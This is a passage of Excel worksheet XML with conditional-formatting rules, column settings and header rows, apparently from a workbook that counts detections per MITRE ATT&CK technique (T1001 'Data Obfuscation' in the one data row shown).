  <conditionalFormatting sqref="B15:G15 I15:J15 B16:J18">
    <cfRule type="expression" dxfId="444" priority="46">
      <formula>IF(B15&gt;B6,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B19:J19">
    <cfRule type="expression" dxfId="443" priority="18">
      <formula>IF(B19&gt;B10,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B23:J23">
    <cfRule type="expression" dxfId="442" priority="45">
      <formula>IF(B23&gt;B14,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B24:J27">
    <cfRule type="expression" dxfId="441" priority="37">
      <formula>IF(B24&lt;B15,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B28:J28">
    <cfRule type="expression" dxfId="440" priority="17">
      <formula>IF(B28&lt;B19,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B42:J42 B43:N45">
    <cfRule type="expression" dxfId="439" priority="5">
      <formula>IF(B42&gt;B33,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B52:J52">
    <cfRule type="expression" dxfId="438" priority="28">
      <formula>IF(OR(B52&lt;B53,B52&lt;B54),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B7:N7">
    <cfRule type="expression" dxfId="437" priority="479">
      <formula>IF(OR(B7&lt;B8,B7&lt;B9),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B12:N12">
    <cfRule type="expression" dxfId="436" priority="15">
      <formula>IF(B12&gt;B5,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B21:N21">
    <cfRule type="expression" dxfId="435" priority="16">
      <formula>IF(B21&lt;B12,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B39:N39">
    <cfRule type="expression" dxfId="434" priority="2">
      <formula>IF(B39&gt;B30,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B41:N41">
    <cfRule type="expression" dxfId="433" priority="6">
      <formula>IF(B41&lt;B32,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B43:N43">
    <cfRule type="expression" dxfId="432" priority="36">
      <formula>IF(OR(B43&lt;B44,B43&lt;B45),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B46:N46">
    <cfRule type="expression" dxfId="431" priority="1">
      <formula>IF(B46&gt;B37,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B48:N48">
    <cfRule type="expression" dxfId="430" priority="20">
      <formula>IF(B48&lt;B39,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B50:N50">
    <cfRule type="expression" dxfId="429" priority="4">
      <formula>IF(B50&lt;B32,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B55:N55">
    <cfRule type="expression" dxfId="428" priority="19">
      <formula>IF(B55&lt;B46,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D6:D9">
    <cfRule type="expression" dxfId="427" priority="522">
      <formula>IF(OR(D6&lt;B6,D6&lt;C6),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D14:D18">
    <cfRule type="expression" dxfId="426" priority="53">
      <formula>IF(OR(D14&lt;B14,D14&lt;C14),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D23:D27">
    <cfRule type="expression" dxfId="425" priority="44">
      <formula>IF(OR(D23&lt;B23,D23&lt;C23),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D32 D34:D36">
    <cfRule type="expression" dxfId="424" priority="14">
      <formula>IF(OR(D32&lt;B32,D32&lt;C32),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D41:D45">
    <cfRule type="expression" dxfId="423" priority="35">
      <formula>IF(OR(D41&lt;B41,D41&lt;C41),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D50:D54">
    <cfRule type="expression" dxfId="422" priority="27">
      <formula>IF(OR(D50&lt;B50,D50&lt;C50),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E6:G9">
    <cfRule type="expression" dxfId="421" priority="509">
      <formula>IF(E6&lt;B6,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E14:G18">
    <cfRule type="expression" dxfId="420" priority="52">
      <formula>IF(E14&lt;B14,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E23:G27">
    <cfRule type="expression" dxfId="419" priority="43">
      <formula>IF(E23&lt;B23,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E32:G32 E34:G36">
    <cfRule type="expression" dxfId="418" priority="13">
      <formula>IF(E32&lt;B32,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E41:G45">
    <cfRule type="expression" dxfId="417" priority="34">
      <formula>IF(E41&lt;B41,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E50:G50 E51:F51 E52:G54">
    <cfRule type="expression" dxfId="416" priority="26">
      <formula>IF(E50&lt;B50,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="G6:G9">
    <cfRule type="expression" dxfId="415" priority="508">
      <formula>IF(OR(G6&lt;E6,G6&lt;F6),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="G14:G18">
    <cfRule type="expression" dxfId="414" priority="51">
      <formula>IF(OR(G14&lt;E14,G14&lt;F14),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="G23:G27">
    <cfRule type="expression" dxfId="413" priority="42">
      <formula>IF(OR(G23&lt;E23,G23&lt;F23),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="G32 G34:G36">
    <cfRule type="expression" dxfId="412" priority="12">
      <formula>IF(OR(G32&lt;E32,G32&lt;F32),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="G41:G45">
    <cfRule type="expression" dxfId="411" priority="33">
      <formula>IF(OR(G41&lt;E41,G41&lt;F41),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="G50 G52:G54">
    <cfRule type="expression" dxfId="410" priority="25">
      <formula>IF(OR(G50&lt;E50,G50&lt;F50),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I6:I9">
    <cfRule type="expression" dxfId="409" priority="504">
      <formula>IF(I6&lt;H6,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I14:I18">
    <cfRule type="expression" dxfId="408" priority="50">
      <formula>IF(I14&lt;H14,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I23:I27">
    <cfRule type="expression" dxfId="407" priority="41">
      <formula>IF(I23&lt;H23,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I32 I34:I36">
    <cfRule type="expression" dxfId="406" priority="11">
      <formula>IF(I32&lt;H32,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I41:I45">
    <cfRule type="expression" dxfId="405" priority="32">
      <formula>IF(I41&lt;H41,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I50:I54">
    <cfRule type="expression" dxfId="404" priority="24">
      <formula>IF(I50&lt;H50,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="J6:J9">
    <cfRule type="expression" dxfId="403" priority="500">
      <formula>IF(OR(J6&lt;H6,J6&lt;I6),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="J14:J18">
    <cfRule type="expression" dxfId="402" priority="49">
      <formula>IF(OR(J14&lt;H14,J14&lt;I14),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="J23:J27">
    <cfRule type="expression" dxfId="401" priority="40">
      <formula>IF(OR(J23&lt;H23,J23&lt;I23),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="J32:J36">
    <cfRule type="expression" dxfId="400" priority="10">
      <formula>IF(OR(J32&lt;H32,J32&lt;I32),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="J33 B34:J36">
    <cfRule type="expression" dxfId="399" priority="7">
      <formula>IF(B33&gt;B6,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="J41:J45">
    <cfRule type="expression" dxfId="398" priority="31">
      <formula>IF(OR(J41&lt;H41,J41&lt;I41),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="J50:J54">
    <cfRule type="expression" dxfId="397" priority="23">
      <formula>IF(OR(J50&lt;H50,J50&lt;I50),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L6:L9">
    <cfRule type="expression" dxfId="396" priority="496">
      <formula>IF(L6&lt;K6,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L14">
    <cfRule type="expression" dxfId="395" priority="48">
      <formula>IF(L14&lt;K14,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L41 L43:L45">
    <cfRule type="expression" dxfId="394" priority="30">
      <formula>IF(L41&lt;K41,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L50 L53:L54">
    <cfRule type="expression" dxfId="393" priority="22">
      <formula>IF(L50&lt;K50,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="N6:N9">
    <cfRule type="expression" dxfId="392" priority="492">
      <formula>IF(N6&lt;M6,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="N14">
    <cfRule type="expression" dxfId="391" priority="47">
      <formula>IF(N14&lt;M14,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="N41 N43:N45">
    <cfRule type="expression" dxfId="390" priority="29">
      <formula>IF(N41&lt;M41,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="N50 N53:N54">
    <cfRule type="expression" dxfId="389" priority="21">
      <formula>IF(N50&lt;M50,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9"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tabColor rgb="FFFF6D8C"/>
    <outlinePr summaryBelow="0" summaryRight="0"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:CT1086"/>
  <sheetViews>
    <sheetView zoomScaleNormal="100" workbookViewId="0">
      <pane xSplit="2" ySplit="2" topLeftCell="F37" activePane="bottomRight" state="frozen"/>
      <selection activeCell="Q6" sqref="Q6"/>
      <selection pane="topRight" activeCell="Q6" sqref="Q6"/>
      <selection pane="bottomLeft" activeCell="Q6" sqref="Q6"/>
      <selection pane="bottomRight" activeCell="C1" sqref="C1:E1048576"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="12.5703125" defaultRowHeight="15.75" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="4" style="4" customWidth="1"/>
    <col min="2" max="2" width="9.7109375" style="4" customWidth="1"/>
    <col min="3" max="3" width="21.140625" style="4" hidden="1" customWidth="1"/>
    <col min="4" max="4" width="9" style="6" hidden="1" customWidth="1"/>
    <col min="5" max="5" width="10.7109375" style="6" hidden="1" customWidth="1"/>
    <col min="6" max="6" width="13.5703125" style="4" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="7.5703125" style="4" customWidth="1"/>
    <col min="8" max="8" width="9.7109375" style="4" customWidth="1"/>
    <col min="9" max="9" width="13.7109375" style="4" customWidth="1"/>
    <col min="10" max="10" width="4.5703125" style="4" customWidth="1"/>
    <col min="11" max="11" width="8.5703125" style="4" customWidth="1"/>
    <col min="12" max="12" width="8" style="4" customWidth="1"/>
    <col min="13" max="14" width="7.5703125" style="4" customWidth="1"/>
    <col min="15" max="15" width="11.85546875" style="4" customWidth="1"/>
    <col min="16" max="16" width="4.5703125" style="4" customWidth="1"/>
    <col min="17" max="17" width="8.5703125" style="4" customWidth="1"/>
    <col min="18" max="18" width="9.7109375" style="4" customWidth="1"/>
    <col min="19" max="20" width="7.5703125" style="4" customWidth="1"/>
    <col min="21" max="21" width="14.85546875" style="4" customWidth="1"/>
    <col min="22" max="22" width="4.5703125" style="4" customWidth="1"/>
    <col min="23" max="24" width="8.5703125" style="4" customWidth="1"/>
    <col min="25" max="26" width="10.42578125" style="4" customWidth="1"/>
    <col min="27" max="27" width="15.5703125" style="4" customWidth="1"/>
    <col min="28" max="28" width="5.42578125" style="4" customWidth="1"/>
    <col min="29" max="29" width="8.5703125" style="4" customWidth="1"/>
    <col min="30" max="30" width="8.28515625" style="3" customWidth="1"/>
    <col min="31" max="32" width="7.5703125" style="4" customWidth="1"/>
    <col min="33" max="33" width="16.42578125" style="4" customWidth="1"/>
    <col min="34" max="34" width="4.5703125" style="4" customWidth="1"/>
    <col min="35" max="35" width="8.5703125" style="4" customWidth="1"/>
    <col min="36" max="36" width="9.7109375" style="4" customWidth="1"/>
    <col min="37" max="38" width="7.5703125" style="4" customWidth="1"/>
    <col min="39" max="39" width="15.85546875" style="4" customWidth="1"/>
    <col min="40" max="40" width="6.5703125" style="4" customWidth="1"/>
    <col min="41" max="41" width="8.5703125" style="4" customWidth="1"/>
    <col min="42" max="42" width="9.28515625" style="4" customWidth="1"/>
    <col min="43" max="43" width="7.5703125" style="4" customWidth="1"/>
    <col min="44" max="44" width="9.5703125" style="4" customWidth="1"/>
    <col min="45" max="45" width="7.5703125" style="4" customWidth="1"/>
    <col min="46" max="46" width="4.5703125" style="4" customWidth="1"/>
    <col min="47" max="47" width="8.5703125" style="4" customWidth="1"/>
    <col min="48" max="48" width="5.5703125" style="4" customWidth="1"/>
    <col min="49" max="49" width="7.5703125" style="4" customWidth="1"/>
    <col min="50" max="50" width="10.42578125" style="4" customWidth="1"/>
    <col min="51" max="51" width="11.28515625" style="4" customWidth="1"/>
    <col min="52" max="52" width="4.5703125" style="4" customWidth="1"/>
    <col min="53" max="53" width="8.5703125" style="4" customWidth="1"/>
    <col min="54" max="54" width="5.5703125" style="3" customWidth="1"/>
    <col min="55" max="55" width="7.5703125" style="4" customWidth="1"/>
    <col min="56" max="56" width="10" style="4" customWidth="1"/>
    <col min="57" max="57" width="12.7109375" style="4" customWidth="1"/>
    <col min="58" max="58" width="4.5703125" style="4" customWidth="1"/>
    <col min="59" max="59" width="8.5703125" style="4" customWidth="1"/>
    <col min="60" max="60" width="5.5703125" style="4" customWidth="1"/>
    <col min="61" max="61" width="7.5703125" style="1" customWidth="1"/>
    <col min="62" max="62" width="10" style="1" customWidth="1"/>
    <col min="63" max="63" width="12.28515625" style="1" customWidth="1"/>
    <col min="64" max="64" width="5.5703125" style="1" customWidth="1"/>
    <col min="65" max="65" width="8.5703125" style="1" customWidth="1"/>
    <col min="66" max="68" width="7.5703125" style="1" customWidth="1"/>
    <col min="69" max="69" width="12.42578125" style="1" customWidth="1"/>
    <col min="70" max="71" width="5.5703125" style="1" customWidth="1"/>
    <col min="72" max="72" width="7.85546875" style="1" customWidth="1"/>
    <col min="73" max="73" width="8.5703125" style="1" customWidth="1"/>
    <col min="74" max="74" width="7.5703125" style="1" customWidth="1"/>
    <col min="75" max="75" width="10.85546875" style="1" customWidth="1"/>
    <col min="76" max="76" width="10.7109375" style="1" customWidth="1"/>
    <col min="77" max="77" width="6.7109375" style="5" customWidth="1"/>
    <col min="78" max="78" width="8.5703125" style="5" customWidth="1"/>
    <col min="79" max="81" width="7.5703125" style="1" customWidth="1"/>
    <col min="82" max="82" width="17.42578125" style="1" customWidth="1"/>
    <col min="83" max="84" width="5.5703125" style="5" customWidth="1"/>
    <col min="85" max="86" width="8.5703125" style="5" customWidth="1"/>
    <col min="87" max="89" width="10.7109375" style="1" customWidth="1"/>
    <col min="90" max="90" width="14.42578125" style="1" customWidth="1"/>
    <col min="91" max="91" width="32.85546875" style="5" hidden="1" customWidth="1"/>
    <col min="92" max="93" width="42.42578125" style="5" hidden="1" customWidth="1"/>
    <col min="94" max="228" width="29.140625" style="1" customWidth="1"/>
    <col min="229" max="16384" width="12.5703125" style="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:93" ht="25.5" customHeight="1">
      <c r="A1" s="663" t="s">
        <v>177</v>
      </c>
      <c r="B1" s="663" t="s">
        <v>285</v>
      </c>
      <c r="C1" s="663" t="s">
        <v>294</v>
      </c>
      <c r="D1" s="663" t="s">
        <v>290</v>
      </c>
      <c r="E1" s="663" t="s">
        <v>291</v>
      </c>
      <c r="F1" s="668" t="s">
        <v>288</v>
      </c>
      <c r="G1" s="665" t="s">
        <v>2432</v>
      </c>
      <c r="H1" s="666"/>
      <c r="I1" s="666"/>
      <c r="J1" s="666"/>
      <c r="K1" s="666"/>
      <c r="L1" s="667"/>
      <c r="M1" s="665" t="s">
        <v>2323</v>
      </c>
      <c r="N1" s="666"/>
      <c r="O1" s="666"/>
      <c r="P1" s="666"/>
      <c r="Q1" s="666"/>
      <c r="R1" s="667"/>
      <c r="S1" s="665" t="s">
        <v>2324</v>
      </c>
      <c r="T1" s="666"/>
      <c r="U1" s="666"/>
      <c r="V1" s="666"/>
      <c r="W1" s="666"/>
      <c r="X1" s="667"/>
      <c r="Y1" s="665" t="s">
        <v>2325</v>
      </c>
      <c r="Z1" s="666"/>
      <c r="AA1" s="666"/>
      <c r="AB1" s="666"/>
      <c r="AC1" s="666"/>
      <c r="AD1" s="667"/>
      <c r="AE1" s="665" t="s">
        <v>2326</v>
      </c>
      <c r="AF1" s="666"/>
      <c r="AG1" s="666"/>
      <c r="AH1" s="666"/>
      <c r="AI1" s="666"/>
      <c r="AJ1" s="667"/>
      <c r="AK1" s="665" t="s">
        <v>2327</v>
      </c>
      <c r="AL1" s="666"/>
      <c r="AM1" s="666"/>
      <c r="AN1" s="666"/>
      <c r="AO1" s="666"/>
      <c r="AP1" s="667"/>
      <c r="AQ1" s="676" t="s">
        <v>1760</v>
      </c>
      <c r="AR1" s="677"/>
      <c r="AS1" s="677"/>
      <c r="AT1" s="666"/>
      <c r="AU1" s="666"/>
      <c r="AV1" s="667"/>
      <c r="AW1" s="665" t="s">
        <v>2328</v>
      </c>
      <c r="AX1" s="666"/>
      <c r="AY1" s="666"/>
      <c r="AZ1" s="666"/>
      <c r="BA1" s="666"/>
      <c r="BB1" s="667"/>
      <c r="BC1" s="665" t="s">
        <v>2329</v>
      </c>
      <c r="BD1" s="666"/>
      <c r="BE1" s="666"/>
      <c r="BF1" s="666"/>
      <c r="BG1" s="666"/>
      <c r="BH1" s="667"/>
      <c r="BI1" s="674" t="s">
        <v>2433</v>
      </c>
      <c r="BJ1" s="675"/>
      <c r="BK1" s="675"/>
      <c r="BL1" s="675"/>
      <c r="BM1" s="675"/>
      <c r="BN1" s="675"/>
      <c r="BO1" s="674" t="s">
        <v>2457</v>
      </c>
      <c r="BP1" s="675"/>
      <c r="BQ1" s="675"/>
      <c r="BR1" s="675"/>
      <c r="BS1" s="675"/>
      <c r="BT1" s="675"/>
      <c r="BU1" s="675"/>
      <c r="BV1" s="671" t="s">
        <v>2458</v>
      </c>
      <c r="BW1" s="672"/>
      <c r="BX1" s="672"/>
      <c r="BY1" s="672"/>
      <c r="BZ1" s="672"/>
      <c r="CA1" s="672"/>
      <c r="CB1" s="671" t="s">
        <v>2459</v>
      </c>
      <c r="CC1" s="672"/>
      <c r="CD1" s="672"/>
      <c r="CE1" s="672"/>
      <c r="CF1" s="672"/>
      <c r="CG1" s="672"/>
      <c r="CH1" s="673"/>
    </row>
    <row r="2" spans="1:93" s="3" customFormat="1" ht="52.5" customHeight="1">
      <c r="A2" s="664"/>
      <c r="B2" s="664"/>
      <c r="C2" s="664"/>
      <c r="D2" s="664"/>
      <c r="E2" s="664"/>
      <c r="F2" s="669"/>
      <c r="G2" s="288" t="s">
        <v>293</v>
      </c>
      <c r="H2" s="392" t="s">
        <v>4457</v>
      </c>
      <c r="I2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="J2" s="4" t="s">
        <v>725</v>
      </c>
      <c r="K2" s="4" t="s">
        <v>2487</v>
      </c>
      <c r="L2" s="585" t="s">
        <v>4131</v>
      </c>
      <c r="M2" s="291" t="s">
        <v>293</v>
      </c>
      <c r="N2" s="291" t="s">
        <v>4457</v>
      </c>
      <c r="O2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="P2" s="582" t="s">
        <v>725</v>
      </c>
      <c r="Q2" s="4" t="s">
        <v>2487</v>
      </c>
      <c r="R2" s="583" t="s">
        <v>4131</v>
      </c>
      <c r="S2" s="396" t="s">
        <v>293</v>
      </c>
      <c r="T2" s="291" t="s">
        <v>4457</v>
      </c>
      <c r="U2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="V2" s="582" t="s">
        <v>725</v>
      </c>
      <c r="W2" s="4" t="s">
        <v>2487</v>
      </c>
      <c r="X2" s="585" t="s">
        <v>4131</v>
      </c>
      <c r="Y2" s="392" t="s">
        <v>293</v>
      </c>
      <c r="Z2" s="392" t="s">
        <v>4457</v>
      </c>
      <c r="AA2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="AB2" s="4" t="s">
        <v>725</v>
      </c>
      <c r="AC2" s="4" t="s">
        <v>2487</v>
      </c>
      <c r="AD2" s="583" t="s">
        <v>4131</v>
      </c>
      <c r="AE2" s="288" t="s">
        <v>293</v>
      </c>
      <c r="AF2" s="392" t="s">
        <v>4457</v>
      </c>
      <c r="AG2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="AH2" s="4" t="s">
        <v>725</v>
      </c>
      <c r="AI2" s="4" t="s">
        <v>2487</v>
      </c>
      <c r="AJ2" s="585" t="s">
        <v>4131</v>
      </c>
      <c r="AK2" s="291" t="s">
        <v>293</v>
      </c>
      <c r="AL2" s="291" t="s">
        <v>4457</v>
      </c>
      <c r="AM2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="AN2" s="582" t="s">
        <v>725</v>
      </c>
      <c r="AO2" s="4" t="s">
        <v>2487</v>
      </c>
      <c r="AP2" s="583" t="s">
        <v>4131</v>
      </c>
      <c r="AQ2" s="396" t="s">
        <v>293</v>
      </c>
      <c r="AR2" s="291" t="s">
        <v>4457</v>
      </c>
      <c r="AS2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="AT2" s="582" t="s">
        <v>725</v>
      </c>
      <c r="AU2" s="4" t="s">
        <v>2487</v>
      </c>
      <c r="AV2" s="585" t="s">
        <v>4131</v>
      </c>
      <c r="AW2" s="392" t="s">
        <v>293</v>
      </c>
      <c r="AX2" s="392" t="s">
        <v>4457</v>
      </c>
      <c r="AY2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="AZ2" s="4" t="s">
        <v>725</v>
      </c>
      <c r="BA2" s="4" t="s">
        <v>2487</v>
      </c>
      <c r="BB2" s="583" t="s">
        <v>4131</v>
      </c>
      <c r="BC2" s="511" t="s">
        <v>293</v>
      </c>
      <c r="BD2" s="512" t="s">
        <v>4457</v>
      </c>
      <c r="BE2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="BF2" s="584" t="s">
        <v>725</v>
      </c>
      <c r="BG2" s="493" t="s">
        <v>2487</v>
      </c>
      <c r="BH2" s="513" t="s">
        <v>4131</v>
      </c>
      <c r="BI2" s="339" t="s">
        <v>293</v>
      </c>
      <c r="BJ2" s="338" t="s">
        <v>4457</v>
      </c>
      <c r="BK2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="BL2" s="324" t="s">
        <v>2252</v>
      </c>
      <c r="BM2" s="325" t="s">
        <v>2488</v>
      </c>
      <c r="BN2" s="336" t="s">
        <v>4132</v>
      </c>
      <c r="BO2" s="339" t="s">
        <v>293</v>
      </c>
      <c r="BP2" s="338" t="s">
        <v>4457</v>
      </c>
      <c r="BQ2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="BR2" s="324" t="s">
        <v>2252</v>
      </c>
      <c r="BS2" s="337" t="s">
        <v>730</v>
      </c>
      <c r="BT2" s="325" t="s">
        <v>2487</v>
      </c>
      <c r="BU2" s="397" t="s">
        <v>4131</v>
      </c>
      <c r="BV2" s="338" t="s">
        <v>293</v>
      </c>
      <c r="BW2" s="338" t="s">
        <v>4457</v>
      </c>
      <c r="BX2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="BY2" s="324" t="s">
        <v>2253</v>
      </c>
      <c r="BZ2" s="324" t="s">
        <v>2489</v>
      </c>
      <c r="CA2" s="336" t="s">
        <v>4133</v>
      </c>
      <c r="CB2" s="404" t="s">
        <v>293</v>
      </c>
      <c r="CC2" s="338" t="s">
        <v>4457</v>
      </c>
      <c r="CD2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="CE2" s="324" t="s">
        <v>2253</v>
      </c>
      <c r="CF2" s="337" t="s">
        <v>730</v>
      </c>
      <c r="CG2" s="325" t="s">
        <v>2487</v>
      </c>
      <c r="CH2" s="397" t="s">
        <v>4131</v>
      </c>
    </row>
    <row r="3" spans="1:93" s="8" customFormat="1" ht="15" customHeight="1">
      <c r="A3" s="4">
        <v>1</v>
      </c>
      <c r="B3" s="4" t="str">
        <f>IFERROR(VLOOKUP(A3,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1001</v>
      </c>
      <c r="C3" s="493" t="str">
        <f>IFERROR(VLOOKUP(B3,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Data Obfuscation</v>
      </c>
      <c r="D3" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B3)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E3" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F3" s="286" t="str">
        <f>D3&amp;" ("&amp;E3&amp;")"</f>
        <v>2 (2)</v>
      </c>
      <c r="G3" s="292">
        <v>6</v>
      </c>
      <c r="H3" s="322">
        <v>3</v>
      </c>
      <c r="I3" s="322" t="str">
        <f>H3 &amp; " (" &amp; G3 &amp; ")"</f>
        <v>3 (6)</v>
      </c>
      <c r="J3" s="12">
        <v>3</v>
      </c>
      <c r="K3" s="13">
        <v>0.5</v>
      </c>
      <c r="L3" s="394">
        <v>1</v>
      </c>
      <c r="M3" s="322">
        <v>0</v>
      </c>
      <c r="N3" s="322">
        <v>0</v>
      </c>
      <c r="O3" s="322" t="str">
        <f>N3 &amp; " (" &amp; M3 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="P3" s="12">
        <v>0</v>
      </c>
      <c r="Q3" s="13">
        <v>0</v>
      </c>
      <c r="R3" s="394">
        <v>0</v>
      </c>
      <c r="S3" s="292">
        <v>6</v>
      </c>
      <c r="T3" s="322">
        <v>3</v>
      </c>
      <c r="U3" s="322" t="str">
        <f>T3 &amp; " (" &amp; S3 &amp; ")"</f>
        <v>3 (6)</v>
      </c>
      <c r="V3" s="12">
        <v>3</v>
      </c>
      <c r="W3" s="13">
        <v>0.5</v>
      </c>
      <c r="X3" s="394">
        <v>1</v>
      </c>
      <c r="Y3" s="392">
        <v>6</v>
      </c>
      <c r="Z3" s="392">
        <v>3</v>
      </c>
      <c r="AA3" s="322" t="str">
        <f>Z3 &amp; " (" &amp; Y3 &amp; ")"</f>
        <v>3 (6)</v>
      </c>
      <c r="AB3" s="392">
        <v>3</v>
      </c>
      <c r="AC3" s="16">
        <v>0.5</v>
      </c>
      <c r="AD3" s="394">
        <v>1</v>
      </c>
      <c r="AE3" s="392">
        <v>8</v>
      </c>
      <c r="AF3" s="392">
        <v>4</v>
      </c>
      <c r="AG3" s="322" t="str">
        <f>AF3 &amp; " (" &amp; AE3 &amp; ")"</f>
        <v>4 (8)</v>
      </c>
      <c r="AH3" s="392">
        <v>2</v>
      </c>
      <c r="AI3" s="16">
        <v>1</v>
      </c>
      <c r="AJ3" s="394">
        <v>2</v>
      </c>
      <c r="AK3" s="392">
        <v>14</v>
      </c>
      <c r="AL3" s="392">
        <v>7</v>
      </c>
      <c r="AM3" s="322" t="str">
        <f>AL3 &amp; " (" &amp; AK3 &amp; ")"</f>
        <v>7 (14)</v>
      </c>
      <c r="AN3" s="392">
        <v>5</v>
      </c>
      <c r="AO3" s="16">
        <v>1</v>
      </c>
      <c r="AP3" s="394">
        <v>2</v>
      </c>
      <c r="AQ3" s="292">
        <v>0</v>
      </c>
      <c r="AR3" s="322">
        <v>0</v>
      </c>
      <c r="AS3" s="322" t="str">
        <f>AR3 &amp; " (" &amp; AQ3 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="AT3" s="12">
        <v>0</v>
      </c>
      <c r="AU3" s="13">
        <v>0</v>
      </c>
      <c r="AV3" s="394">
        <v>0</v>
      </c>
      <c r="AW3" s="392">
        <v>0</v>
      </c>
      <c r="AX3" s="392">
        <v>0</v>
      </c>
